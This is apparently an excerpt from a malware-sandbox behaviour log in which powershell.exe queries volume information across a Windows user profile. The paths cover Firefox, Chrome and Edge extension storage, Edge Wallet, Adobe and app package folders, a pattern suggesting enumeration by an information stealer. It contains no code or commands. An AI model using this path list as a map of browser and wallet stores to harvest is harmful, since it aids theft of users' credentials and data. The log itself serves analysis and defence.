      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation (6 consecutive identical events)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation (3 consecutive identical events)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Adobe | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Adobe\CRLogs | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Sonar\SonarCC | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Network | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Network\Connections | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Application Data | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\History | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hant VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\de VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\en-GB VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\it VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\ja VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hans VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\Content\Anonymous VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\SDX VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\input\sr-Latn-RS VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\INetHistory VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\LocalCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\AC\INetHistory VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\TempState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache\Roaming\Microsoft\Windows\Start Menu\Programs VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\TempState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\LocalState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\TempState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\SystemAppData VolumeInformation
